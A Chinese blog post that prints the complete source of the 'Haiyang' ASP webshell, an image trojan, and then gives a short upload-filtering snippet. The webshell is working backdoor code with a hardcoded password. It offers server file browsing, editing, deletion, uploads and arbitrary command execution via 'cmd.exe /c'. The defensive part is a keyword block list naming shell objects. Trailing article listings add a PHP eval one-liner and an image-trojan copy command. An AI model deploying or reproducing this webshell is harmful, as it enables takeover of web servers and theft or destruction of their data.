图片木马(海阳木马)的代码及防止上传的方法

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量4.1k 收藏
点赞数
分类专栏: ASP 文章标签: path upload vbscript shell url 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cncco/article/details/1673222
版权

一、海阳图片木马代码:

其实不一定是这样,只要是HTML代码或ASP任何代码均可。

< %@ LANGUAGE = " VBSCRIPT "  codepage  = " 936 "  % >
< title > 111 </ title >
< style >
body{font - family: 宋体 
; font - size: 10pt}
table{ font - family: 宋体; font - size: 9pt }
a{ font - family: 宋体; font - size: 9pt; color: # 000000 ; text - decoration: none }
a:hover{ font - family: 宋体; color: # 807123 ; text - decoration: none }
input { BORDER - RIGHT : # 888888  1px solid; BORDER - TOP: # 888888  1px solid; BACKGROUND: #ffffff; BORDER - LEFT : # 888888  1px solid; BORDER - BOTTOM: # 888888  1px solid; FONT - FAMILY:  " Verdana " " Arial " font - color: #ffffff;FONT - SIZE: 9pt;
 </ style >
< if  request( " up " ) = 1   then  % >
< %Server.ScriptTimeOut = 5000 % >
< SCRIPT RUNAT = SERVER LANGUAGE = VBSCRIPT >
dim  Data_5xsoft
Class upload_5xsoft
 dim  objForm,objFile,Version
 Public   function  Form(strForm)
strForm = lcase (strForm)
 if   not  objForm.exists(strForm)  then
Form = ""
else
Form = objForm(strForm)
 end   if
end function
Public   function  File(strFile)
strFile = lcase (strFile)
 if   not  objFile.exists(strFile)  then
set  File = new  FileInfo
 else
set  File = objFile(strFile)
 end   if
end function
Private   Sub  Class_Initialize
 dim  RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
 dim  iFileSize,sFilePath,sFileType,sFormValue,sFileName
 dim  iFindStart,iFindEnd
 dim  iFormStart,iFormEnd,sFormName
 set  objForm = Server.CreateObject( " Scripting.Dictionary " )
 set  objFile = Server.CreateObject( " Scripting.Dictionary " )
 if  Request.TotalBytes < 1   then   Exit   Sub
set  tStream  =  Server.CreateObject( " adodb.stream " )
 set  Data_5xsoft  =  Server.CreateObject( " adodb.stream " )
Data_5xsoft.Type  =   1
Data_5xsoft.Mode  = 3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position = 0
RequestData  = Data_5xsoft.Read
iFormStart  =   1
iFormEnd  =  LenB(RequestData)
vbCrlf  =  chrB( 13 &  chrB( 10 )
sStart  =  MidB(RequestData, 1 , InStrB(iFormStart,RequestData,vbCrlf) - 1 )
iStart  =  LenB (sStart)
iFormStart = iFormStart + iStart + 1
while  (iFormStart  +   10 <  iFormEnd
iInfoEnd  =  InStrB(iFormStart,RequestData,vbCrlf  &  vbCrlf) + 3
tStream.Type  =   1
tStream.Mode  = 3
tStream.Open
Data_5xsoft.Position  =  iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd - iFormStart
tStream.Position  =   0
tStream.Type  =   2
tStream.Charset  = " gb2312 "
sInfo  =  tStream.ReadText
tStream.Close
iFormStart  =  InStrB(iInfoEnd,RequestData,sStart)
iFindStart  =   InStr ( 22 ,sInfo, " name="" " , 1 ) + 6
iFindEnd  =   InStr (iFindStart,sInfo, " "" " , 1 )
sFormName  =   lcase ( Mid  (sinfo,iFindStart,iFindEnd - iFindStart))
 if   InStr  ( 45 ,sInfo, " filename="" " , 1 >   0   then
set  theFile = new  FileInfo
iFindStart  =   InStr (iFindEnd,sInfo, " filename="" " , 1 ) + 10
iFindEnd  =   InStr (iFindStart,sInfo, " "" " , 1 )
sFileName  =   Mid  (sinfo,iFindStart,iFindEnd - iFindStart)
theFile.FileName = getFileName(sFileName)
theFile.FilePath = getFilePath(sFileName)
iFindStart  =   InStr (iFindEnd,sInfo, " Content-Type:  " , 1 ) + 14
iFindEnd  =   InStr (iFindStart,sInfo,vbCr)
theFile.FileType  = Mid  (sinfo,iFindStart,iFindEnd - iFindStart)
theFile.FileStart  = iInfoEnd
theFile.FileSize  =  iFormStart  - iInfoEnd  - 3
theFile.FormName = sFormName
 if   not  objFile.Exists(sFormName)  then
objFile.add sFormName,theFile
 end   if
else
tStream.Type  = 1
tStream.Mode  = 3
tStream.Open
Data_5xsoft.Position  =  iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart - iInfoEnd - 3
tStream.Position  =   0
tStream.Type  =   2
tStream.Charset  = " gb2312 "
sFormValue  =  tStream.ReadText
tStream.Close
 if  objForm.Exists(sFormName)  then
objForm(sFormName) = objForm(sFormName) & " " & sFormValue
 else
objForm.Add sFormName,sFormValue
 end   if
end   if
iFormStart = iFormStart + iStart + 1
wend
RequestData = ""
set  tStream  = nothing
End Sub
Private   Sub  Class_Terminate
 if  Request.TotalBytes > 0   then
objForm.RemoveAll
objFile.RemoveAll
 set  objForm = nothing
set  objFile = nothing
Data_5xsoft.Close
 set  Data_5xsoft  = nothing
end   if
End Sub
Private   function  GetFilePath(FullPath)
 If  FullPath  <>   ""   Then
GetFilePath  =   left (FullPath, InStrRev (FullPath,  " " ))
 Else
GetFilePath  =   ""
End   If
End function
Private   function  GetFileName(FullPath)
 If  FullPath  <>   ""   Then
GetFileName  =   mid (FullPath, InStrRev (FullPath,  " " ) + 1 )
 Else
GetFileName  =   ""
End   If
End function
End  Class
Class FileInfo
 dim  FormName,FileName,FilePath,FileSize,FileType,FileStart
 Private   Sub  Class_Initialize
FileName  =   ""
FilePath  =   ""
FileSize  =   0
FileStart =   0
FormName  =   ""
FileType  =   ""
End Sub
Public   function  SaveAs(FullPath)
 dim  dr,ErrorChar,i
SaveAs = true
if   trim (fullpath) = ""   or  FileStart = 0   or  FileName = ""   or   right (fullpath, 1 ) = " / "   then   exit   function
set  dr = CreateObject ( " Adodb.Stream " )
dr.Mode = 3
dr.Type = 1
dr.Open
Data_5xsoft.position = FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath, 2
dr.Close
 set  dr = nothing
SaveAs = false
end function
End  Class
 </ SCRIPT >
< %
 dim  upload,file,formName,formPath,iCount
 set  upload = new  upload_5xsoft
 if  upload.form( " filepath " ) = ""   then
response.write  " 请输入要上传至的目录! "
set  upload = nothing
response.end
 else
formPath = upload.form( " filepath " )
 if   right (formPath, 1 ) <> " / "   then  formPath = formPath & " / "
end   if
iCount = 0
for   each  formName in upload.objForm
 next
response.write  " <br> "
for   each  formName in upload.objFile
 set  file = upload.file(formName)
 if  file.FileSize > 0   then
file.SaveAs Server.mappath(formPath & file.FileName)
response.write  " <center> " & file.FilePath & file.FileName & "  ( " & file.FileSize & " ) =>  " & formPath & File.FileName & "  上传成功!</center><br> "
iCount = iCount + 1
end   if
set  file = nothing
next
set  upload = nothing
response.write  " <center> " & iCount & " 个文件上传结束!</center> "
response.write  " <center><br><a href=""javascript:history.back();""><font color='#D00000'>返回上一页</font></a></center> "
else
url =  Request.ServerVariables( " URL " )
 ' 修改下面的haiyangtop.126.com改为你密码
if   trim (request.form( " password " )) = " haiyangtop.126.com "   then
response.cookies( " password " ) = " allen "
response.redirect  "" & url & ""
else   if  Request.Cookies( " password " ) <> " allen "   then
call  login()
response.end
 end   if
select   case  request( " id " )
 case   " edit "
call  edit()
 case   " upload "
call  upload()
 case   " dir "
call  dir()
 case   else
call  main()
 end   select
end   if
sub  login()
 for  i = 0   to   25
on   error   resume   next
IsObj = false
VerObj = ""
dim  TestObj
 set  TestObj = server.CreateObject(ObjTotest(i, 0 ))
 If   - 2147221005   <>  Err  then
IsObj  =   True
VerObj  =  TestObj.version
 if  VerObj = ""   or   isnull (VerObj)  then  VerObj = TestObj.about
 end   if
ObjTotest(i, 2 ) = IsObj
ObjTotest(i, 3 ) = VerObj
 next
% >
< body >< center >
< table border = 0  width = 500  cellspacing = 0  cellpadding = 0  bgcolor = " #B8B8B8 " >
< tr >< td >
< table border = 0  width = 100 % cellspacing = 1  cellpadding = 0 >
< tr bgcolor = " #EEEEEE "  height = 18 >
< td width = " 59% "  align = left >  服务器名 </ td >
< td width = " 41% "  bgcolor = " #EEEEEE " >   < % = Request.ServerVariables( " SERVER_NAME " )% ></ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left >  服务器IP </ td >
< td >   < % = Request.ServerVariables( " LOCAL_ADDR " )% ></ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left >  服务器端口 </ td >
< td >   < % = Request.ServerVariables( " SERVER_PORT " )% ></ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left >  服务器时间 </ td >
< td >   < % = now % ></ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left >  本文件绝对路径 </ td >
< td >   < % = server.mappath(Request.ServerVariables( " SCRIPT_NAME " ))% ></ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left >  服务器CPU数量 </ td >
< td >   < % = Request.ServerVariables( " NUMBER_OF_PROCESSORS " )% >  个 </ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left >  服务器操作系统 </ td >
< td >   < % = Request.ServerVariables( " OS " )% ></ td >
</ tr >
< tr bgcolor = " #EEEEEE "  height = 18 >
< td align = left >< font class = fonts > 服务器运算速度测试 </ font ></ td >
< td >  完成时间 </ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left > Allen的电脑(521M,Athlon2200 + </ td >
< td >   186.6  毫秒 </ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left > 中国频道虚拟主机( 2002 - 08 - 06 </ td >
< td >   610.9  毫秒 </ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >
< td align = left > 西部数码west263主机( 2002 - 08 - 06 </ td >
< td >   357.8  毫秒 </ td >
</ tr >
< tr bgcolor = " #FFFFFF "  height = 18 >< %
 dim  t1,t2,lsabc,thetime
t1 = timer
for  i = 1   to   500000
lsabc =   1   +   1
next
t2 = timer
thetime = cstr ( int (( (t2 - t1) * 10000  ) + 0.5 ) / 10 )
% >< td align = left >< font color = red > 您正在使用的这台服务器 </ font >   </ td >
< td >   < font color = red >< % = thetime% >  毫秒 </ font ></ td >
</ tr >
</ table >
</ td >
</ tr >
</ table >
< html >
< body >< center >
< table >
< %response.write  " <font class=fonts>一次只能执行一个操作:)在本页操作不需要FSO支持&当服务器时间</font> "  % >
< %response.write  now ()% >< BR >
< form action = " <%= Request.ServerVariables( " URL " ) %> "  method = " POST " >
< input type = text name = text value = " <%=szCMD %> " >   < font class = fonts > 输入要浏览的目录,最后要加 </ font >< br >
< input type = text name = text1 value = " <%=szCMD1 %> " >
copy
 < input type = text name = text2 value = " <%=szCMD2 %> " >< br >
< input type = text name = text3 value = " <%=szCMD3 %> " >
move
 < input type = text name = text4 value = " <%=szCMD4 %> " >< br >
路径: < input type = text name = text5 value = " <%=szCMD5 %> " >
程序: < input type = text name = text6 value = " <%=szCMD6 %> " >< br >
< input type = submit name = sb value = 发送命令 class = input >
</ form >
</ table >
</ center >
</ body >
</ html >
< %
szCMD  =  Request.Form( " text " ' 目录浏览
if  (szCMD  <>   "" then
set  shell = server.createobject( " shell.application " ' 建立shell对象
set  fod1 = shell.namespace(szcmd)
 set  foditems = fod1.items
 for   each  co in foditems
response.write  " <font color=red> "   &  co.path  &   " ----- "   &  co.size  &   " </font><br> "
next
end   if
% >

< %
szCMD1  =  Request.Form( " text1 " ' 目录拷贝,不能进行文件拷贝
szCMD2  =  Request.Form( " text2 " )
 if  szcmd1 <> ""   and  szcmd2 <> ""   then
set  shell1 = server.createobject( " shell.application " ' 建立shell对象
set  fod1 = shell1.namespace(szcmd2)
 for  i = len (szcmd1)  to   1  step  - 1
if   mid (szcmd1,i, 1 ) = " "   then
path = left (szcmd1,i - 1 )
 exit   for
end   if
next
if   len (path) = 2   then  path = path  &   " "
path2 = right (szcmd1, len (szcmd1) - i)
 set  fod2 = shell1.namespace(path)
 set  foditem = fod2.parsename(path2)
fod1.copyhere foditem
response.write  " command completed success! "
end   if
% >

< %
szCMD3  =  Request.Form( " text3 " ' 目录移动
szCMD4  =  Request.Form( " text4 " )
 if  szcmd3 <> ""   and  szcmd4 <> ""   then
set  shell2 = server.createobject( " shell.application " ' 建立shell对象
set  fod1 = shell2.namespace(szcmd4)

 for  i = len (szcmd3)  to   1  step  - 1
if   mid (szcmd3,i, 1 ) = " "   then
path = left (szcmd3,i - 1 )
 exit   for
end   if
next

if   len (path) = 2   then  path = path  &   " "
path2 = right (szcmd3, len (szcmd3) - i)
 set  fod2 = shell2.namespace(path)
 set  foditem = fod2.parsename(path2)
fod1.movehere foditem
response.write  " command completed success! "
end   if
% >
< %
szCMD5  =  Request.Form( " text5 " ' 执行程序要指定路径
szCMD6  =  Request.Form( " text6 " )
 if  szcmd5 <> ""   and  szcmd6 <> ""   then
set  shell3 = server.createobject( " shell.application " ' 建立shell对象
shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
response.write  " command completed success! "
end   if
% >


< form method = " POST "  action = "" & url & "" >
Enter Password: < input type = " password "  name = " password " size = " 20 " >
< input type = " submit "  value = " LOGIN " >
</ center ></ form >
</ body >
< % end sub % >
< % sub  main()
 ' 修改下面的urlpath改为你服务器的实际URL
urlpath = " http://localhost "
dim  cpath,lpath
 set  fsoBrowse = CreateObject ( " Scripting.FileSystemObject " )
 if  Request( " path " ) = ""   then
lpath = " / "
else
lpath = Request( " path " ) & " / "
end   if
if  Request( " attrib " ) = " true "   then
cpath = lpath
attrib = " true "
else
cpath = Server.MapPath(lpath)
attrib = ""
end   if
% >< html >
< script language = " javascript " >
function  crfile(ls)
{ if  (ls == "" ){alert( " 请输入文件名! " );}
 else  {window.open( " <%=url%>?id=edit&attrib=<%=request( " attrib " )%>&creat=yes&path=<%=lpath%> " + ls);}
return  false ;
}
 function  crdir(ls)
{ if  (ls == "" ){alert( " 请输入文件名! " );}
 else  {window.open( " <%=url%>?id=dir&attrib=<%=request( " attrib " )%>&op=creat&path=<%=lpath%> " + ls);}
return  false ;
}
 </ script >
< script language = " vbscript " >
sub  rmdir(ls)
 if  confirm( " 你真的要删除这个目录吗! " & Chr ( 13 ) & Chr ( 10 ) & " 目录为: " & ls)  then
window.open( " <%=url%>?id=dir&path= " & ls & " &op=del&attrib=<%=request( " attrib " )%> " )
 end   if
end sub
sub  copyfile(sfile)
dfile = InputBox ( "" & Chr ( 13 ) & Chr ( 10 ) & " 源文件: " & sfile & Chr ( 13 ) & Chr ( 10 ) & " 请输入目标文件的文件名: " & Chr ( 13 ) & Chr ( 10 ) & " 许带路径,要根据你的当前路径模式. 注意:绝对路径示例c:/或c:都可以 " )
dfile = trim (dfile)
attrib = " <%=request( " attrib " )%> "
if  dfile <> ""   then
if   InStr (dfile, " : " or   InStr (dfile, " / " ) = 1   then
lp = ""
if   InStr (dfile, " : " and  attrib <> " true "   then
alert  " 对不起,你在相对路径模式下不能使用绝对路径 " & Chr ( 13 ) & Chr ( 10 ) & " 错误路径:[ " & dfile & " ] "
exit   sub
end   if
else
lp = " <%=lpath%> "
end   if
window.open( "" & url & " ?id=edit&path= " + sfile + " &op=copy&attrib= " + attrib + " &dpath= " + lp + dfile)
 else
alert " 您没有输入文件名! "
end   If
end sub
</ script >< body bgcolor = " #F5F5F5 " >
< TABLE cellSpacing = 1  cellPadding = 3  width = " 750 "  align = center
bgColor = #b8b8b8 border = 0 >
< TBODY >
< TR  >
< TD
height = 22  colspan = " 4 "  bgcolor = " #eeeeee "   > 切换盘符:
 < %
 For   Each  thing in fsoBrowse.Drives
Response.write  " <a href=' " & url & " ?path= " & thing.DriveLetter & " :&attrib=true'> " & thing.DriveLetter & " 盘:</a>  "
NEXT
% >   本机局域网地址:
 < %
 Set  oScript  =  Server.CreateObject( " WSCRIPT.SHELL " )
 Set  oScriptNet  =  Server.CreateObject( " WSCRIPT.NETWORK " )
 Set  oFileSys  =  Server.CreateObject( " Scripting.FileSystemObject " )
% >< % =   " / "   &  oScriptNet.ComputerName  &   " "   &  oScriptNet.UserName % >   </ TD >
</ TR >   < TD colspan = " 4 "  bgcolor = " #ffffff "   >< %
 if  Request( " attrib " ) = " true "   then
response.write  " <a href=' " & url & " '><font color='#D00000'>点击切换到相对路径编辑模式</font></a> "
else
response.write  " <a href=' " & url & " ?attrib=true'><font color='#D00000'>点击切换到绝对路径编辑模式</font></a> "
end   if
% > 绝对路径:  < % = cpath% >    当前浏览目录: < % = lpath% ></ TD ></ TR >   < TR >
< TD height = 22  colspan = " 4 "  bgcolor = " #eeeeee "   >
< form name = " form1 "  method = " post "  action = " <%=url%> "   >
浏览目录:  < input type = " text "  name = " path "  size = " 30 "  value = " c: " >
< input type = " hidden "  name = " attrib "  value = " true " >
< input type = " submit "  name = " Submit "  value = " 浏览目录 "   >  〖请使用绝对路径,支持局域网地址!〗
 </ TD ></ form >
</ TR >< TR  >
< TD colspan = " 4 "  bgcolor = " #ffffff "   >< form name = " form1 "  method = " post "  action = " <%=url%>?up=1 "  enctype = " multipart/form-data "   >
< input type = " hidden "  name = " act "  value = " upload " >
上传到:
 < input name = " filepath "  type = " text "  value = " / "  size = " 5 " >
文件地址:
 < input type = " file "  name = " file1 "  value = "" >
< input type = " submit "  name = " Submit "  value = " 上传文件 "   >  〖请使用相对路径!〗
 </ TD >
</ form ></ TR >
< TR bgcolor = " #eeeeee " >
< TD colspan = " 4 "   >
< %
 On   Error   Resume   Next
Set  oScript  =  Server.CreateObject( " WSCRIPT.SHELL " )
 Set  oScriptNet  =  Server.CreateObject( " WSCRIPT.NETWORK " )
 Set  oFileSys  =  Server.CreateObject( " Scripting.FileSystemObject " )
szCMD  =  Request.Form( " .CMD " )
 If  (szCMD  <>   "" Then
szTempFile  =   " C: "   &  oFileSys.GetTempName( )
 Call  oScript.Run ( " cmd.exe /c  "   &  szCMD  &   "  >  "   &  szTempFile,  0 True )
 Set  oFile  =  oFileSys.OpenTextFile (szTempFile,  1 False 0 )
 End   If % >
< FORM action = " <%= Request.ServerVariables( " URL " ) %> "  method = " POST " >
< input type = text name = " .CMD "  size = 40  value = " <%= szCMD %> " >
< input type = submit value = " 执行程序 "   >  〖请使用绝对路径,并且确定你有相应权限!〗
 < If  ( IsObject (oFile))  Then
On   Error   Resume   Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
 Call  oFileSys.DeleteFile(szTempFile,  True )
 End   If  % >
</ TD >   </ FORM ></ TR >
< TR bgColor = #ffffff >
< TD height = 22  colspan = " 4 "   >< form name = " newfile "
onSubmit = " return crfile(newfile.filename.value); " >
< input type = " text "  name = " filename "  size = " 40 " >
< input type = " submit "  value = " 新建文件 "   >
< input type = " button "  value = " 新建目录 " onclick = " crdir(newfile.filename.value) " > 〖新建文件和新建目录不能同名〗
 </ TD ></ form >
</ TR >
< TR >
< TD height = 22  width = " 26% "  rowspan = " 2 "  valign = " top "  bgColor = #eeeeee  >
< %
 dim  theFolder,theSubFolders
 if  fsoBrowse.FolderExists(cpath) then
Set  theFolder = fsoBrowse.GetFolder(cpath)
 Set  theSubFolders = theFolder.SubFolders
Response.write " <a href=' " & url & " ?path= " & Request( " oldpath " ) & " &attrib= " & attrib & " '><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br> "
For   Each  x In theSubFolders
Response.write " <a href=' " & url & " ?path= " & lpath & x.Name & " &oldpath= " & Request( " path " ) & " &attrib= " & attrib & " '>└<font color='#FF8000'>■</font>  " & x.Name & " </a> <a href= " & chr ( 34 ) & " javascript: rmdir(' " & lpath & x.Name & " ') " & chr ( 34 ) & " ><font color='#FF8000' >×</font>删除</a><br> "
Next
end   if
% >
</ TD >
< TD width = " 45% "  bgColor = #eeeeee > 文件名 (鼠标移到文件名可以查看给文件的属性) </ TD >
< TD width = " 11% "  bgColor = #eeeeee > 大小(字节) </ TD >
< TD width = " 18% "  bgColor = #eeeeee > 文件操作 </ TD >
</ TR >
< TR >
< TD height = 200  colspan = " 3 "  valign = " top "  bgColor = #ffffff >
< %
 dim  theFiles
 if  fsoBrowse.FolderExists(cpath) then
Set  theFolder = fsoBrowse.GetFolder(cpath)
 Set  theFiles = theFolder.Files
Response.write " <table border='0' width='100%' cellpadding='0'> "
For   Each  x In theFiles
 if  Request( " attrib " ) = " true "   then
showstring = " <strong> " & x.Name & " </strong> "
else
showstring = " <a href=' " & urlpath & lpath & x.Name & " ' title=' " & " 类型 " & x.type & chr ( 10 ) & " 属性 " & x.Attributes & chr ( 10 ) & " 时间: " & x.DateLastModified & " 'target='_blank'><strong> " & x.Name & " </strong></a> "
end   if
Response.write " <tr><td width='50%'><font color='#FF8000'>□</font> " & showstring & " </td><td width='8%'> " & x.size & " </a></td><td width='20%'><a href=' " & url & " ?id=edit&path= " & lpath & x.Name & " &attrib= " & attrib & " ' target='_blank' >  编辑</a><a href=' " & url & " ?id=edit&path= " & lpath & x.Name & " &op=del&attrib= " & attrib & " ' target='_blank' >  删除</a><a href='#' οnclick=copyfile(' " & lpath & x.Name & " ')>  复制</a></td></tr> "
Next
end   if
Response.write " </table> "
% >
</ TD >
</ TR ></ TBODY >
</ TABLE >
< end sub
sub  edit()
 if  request( " op " ) = " del "   then
if  Request( " attrib " ) = " true "   then
whichfile = Request( " path " )
 else
whichfile = server.mappath(Request( " path " ))
 end   if
Set  fs  =   CreateObject ( " Scripting.FileSystemObject " )
 Set  thisfile  =  fs.GetFile(whichfile)
thisfile.Delete  True
Response.write  " <br><center>删除成功!要刷新才能看到效果.</center> "
else
if  request( " op " ) = " copy "   then
if  Request( " attrib " ) = " true "   then
whichfile = Request( " path " )
dsfile = Request( " dpath " )
 else
whichfile = server.mappath(Request( " path " ))
dsfile = Server.MapPath(Request( " dpath " ))
 end   if
Set  fs  =   CreateObject ( " Scripting.FileSystemObject " )
 Set  thisfile  =  fs.GetFile(whichfile)
thisfile.copy dsfile
Response.write  " <center><p>源文件: " + whichfile + " </center> "
Response.write  " <center><br>目的文件: " + dsfile + " </center> "
Response.write  " <center><br>复制成功!要刷新才能看到效果!</p></center> "
else
if  request.form( " text " ) = ""   then
if  Request( " creat " ) <> " yes "   then
if  Request( " attrib " ) = " true "   then
whichfile = Request( " path " )
 else
whichfile = server.mappath(Request( " path " ))
 end   if
Set  fs  =   CreateObject ( " Scripting.FileSystemObject " )
 Set  thisfile  =  fs.OpenTextFile(whichfile,  1 False )
counter = 0
thisline = thisfile.readall
thisfile.Close
 set  fs = nothing
end   if
% >
< form method = " POST "  action = "" & url & " ?id=edit " >
< input type = " hidden "  name = " attrib "  value = " <%=Request( " attrib " )%> " >
< br >
< TABLE cellSpacing = 1  cellPadding = 3  width = " 750 "  align = center
bgColor = #b8b8b8 border = 0 >
< TBODY >
< TR  >
< TD
height = 22  bgcolor = " #eeeeee "   >< div align = " center " ></ div ></ TD >
</ TR >
< TR  >
< TD width = " 100% "
height = 22  bgcolor = " #ffffff "   > 文件名:
 < input type = " text "  name = " path "  size = " 45 "
value = " <%=Request( " path " )%> " readonly >
</ TD >
</ TR >
< TR >
< TD
height = 22  bgcolor = " #eeeeee "   >   < div align = " center " >
< textarea rows = " 25 "  name = " text "  cols = " 105 " >< % = thisline% ></ textarea >
</ div ></ TD >
</ TR >
< TR >
< TD
height = 22  bgcolor = " #ffffff "   >< div align = " center " >
< input type = " submit "
value = " 提交 "  name = " B1 " >
< input type = " reset "  value = " 复原 "  name = " B2 " >
</ div ></ TD >
</ TR >
</ TABLE >
</ form >
< % else
if  Request( " attrib " ) = " true "   then
whichfile = Request( " path " )
 else
whichfile = server.mappath(Request( " path " ))
 end   if
Set  fs  =   CreateObject ( " Scripting.FileSystemObject " )
 Set  outfile = fs.CreateTextFile(whichfile)
outfile.WriteLine Request( " text " )
outfile.close
 set  fs = nothing
Response.write  " <center>修改成功!要刷新才能看到效果!</center> "
end   if
end   if
end   if
end sub
end   if
% >
< sub  dir()
 if  request( " op " ) = " del "   then
if  Request( " attrib " ) = " true "   then
whichdir = Request( " path " )
 else
whichdir = server.mappath(Request( " path " ))
 end   if
Set  fs  =   CreateObject ( " Scripting.FileSystemObject " )
fs.DeleteFolder whichdir, True
Response.write  " <center>删除成功!要刷新才能看到效果,删除的目录为:<b> " & whichdir & " </b></center> "
else
if  request( " op " ) = " creat "   then
if  Request( " attrib " ) = " true "   then
whichdir = Request( " path " )
 else
whichdir = server.mappath(Request( " path " ))
 end   if
Set  fs  =   CreateObject ( " Scripting.FileSystemObject " )
fs.CreateFolder whichdir
Response.write  " <center>建立成功!要刷新才能看到效果,建立的目录为:<b> " & whichdir & " </b></center> "
end   if
end   if
end sub
% >
< br >

</ body >
</ html >

 二、ASP防上传木马代码

1、首先判断上传文件大小

if  file.filesize < 10   then
   Response.Write( " <script>alert('您没有选择上传文件')</script> " )
   Response.Write( " <script>history.go(-1)</script> " )
   Response.End()
 end   if

2、将文件上传到服务器后,判断用户文件中的危险操作字符

set  MyFile  =  server.CreateObject( " Scripting.FileSystemObject " )
 set  MyText  =  MyFile.OpenTextFile(FilePath,  1 ' 读取文本文件
sTextAll  =   lcase (MyText.ReadAll)
MyText.close
 set  MyFile  =   nothing
sStr = " .getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas
|wscript.shell|script.encode|server.|.createobject| execute |activexobject|language = "
 sNoString  =   split (sStr, " | "
for  i = 0   to   ubound (sNoString)
    if   instr (sTextAll,sNoString(i))  then
      set  filedel  =  server.CreateObject( " Scripting.FileSystemObject " )
     filedel.deletefile FilePath
      set  filedel  =   nothing
     Response.Write( " <script>alert('您上传的文件有问题,上传失败');window.close();</script> " )
     Response.End()
    end   if
next


 

cncco
关注
专栏目录
完了完了 我好像中奖了!(木马病毒)
西八老码
07-29 305
描述 最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下: 我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过base64编码的Class文件,这样就可以解码然后被类加载器加载,而我们知道类被加载的时候是可以执行static代码块的,而这个代码块可以任由攻击者来指定要执行的代码,是非常危险的,为了更加形象我特意做了一个模拟攻击。 模拟攻击 准备木马文件 准备一个Tomcat,直接启动即可,默认访问的是ROOT目录下的
一次被木马攻击的记录
kshzhaohui的专栏
07-29 340
描述 最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下: 我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过base64编码的Class文件,这样就可以解码然后被类加载器加载,而我们知道类被加载的时候是可以执行static代码块的,而这个代码块可以任由攻击者来指定要执行的代码,是非常危险的,为了更加形象我特意做了一个模拟攻击。 模拟攻击 准备木马文件 准备一个Tomcat,直接启动即可,默认访问的是ROOT目录下的
jpg 木马如何执行 如何防止.JPG类型木马
09-30
防止.NET木马列所有站物理路径,防止.JPG类型木马 我的服务器上被人上传了一个.NET木马,,这次让我认识到以前没有见过的上传木马的招数,,同时也找出一些对策,分享给给大家。
PHP防止图片木马攻击
weixin_33868027的博客
05-08 683
2019独角兽企业重金招聘Python工程师标准>>> ...
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 2188
图片马:就是在图片中隐藏一句话木马。利用.htaccess等。
Atitit.图片木马的原理与防范 attilax 总结
weixin_33724046的博客
02-17 185
Atitit.图片木马的原理与防范 attilax 总结   1.1. 像图片的木马桌面程序1 1.2. Web 服务端图片木马1 1.3. 利用了Windows的漏洞1 1.4. 这些漏洞不止Windows有,是很多软件都有,甚至sns wechat工具2 1.5. 利于图片meta数据区2 1.6. “会动的图片”—Flash动画,无需利用系统漏洞,而是利用动画本身的特性,直接对...
图片木马的制作
qq_46277212的博客
06-27 743
1.一张图片,jpg格式 1.jpg 2.一句话木马 2.asp <?php eval requset ("value");?> 3.cmd: copy 1.jpg/b+1.asp/a 2.jpg 使用Notepad++打开可发现,在jpg文件底部有着木马代码
海阳顶端ASP木马反查杀动画教程
01-12
海阳顶端ASP木马反查杀动画教程 学习使用
ASP+MSSQL2000 数据库被批量注入后的解决方法第1/2页
01-02
然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马;然后,黑客就把这个网站纳入他的肉鸡列表,随时在数据库里加入自己希望...
海阳顶端网马2006官方正式版发布
02-28
海阳顶端网马2006官方正式版发布】是一款由“刺客网安”团队推出的网络安全工具,主要针对的是2006年的网络环境。这个版本被视为该软件的重要里程碑,意味着它经过了充分的测试和完善,具备了稳定性和安全性,可供...
图片木马
weixin_54252904的博客
04-17 400
借鉴别人许多 图片木马的合并 copy 1.jpg/b+2.php/a 生成的.jpg 也可以在图片版权中添加Php脚本语言 文件幻术 文件幻术 png 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 jpg FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2c gif 47 49 46 38 39 61 F1 00 2C 01 F7 00 00 64 32 33 后缀名绕过 .php .php2 .php3
一个典型的ASP木马程序源码
Beyond2007的专栏
02-26 2649
Response.Write ("欢迎您");mypass="chinait"if request("userpass")=mypass thensession("admin")=mypassend ifif request("logout")="退出登录" thensession("admin")=""end ifif session("admin")="" thenresponse.w
美人计--图片asp木马
weixin_33733810的博客
03-28 133
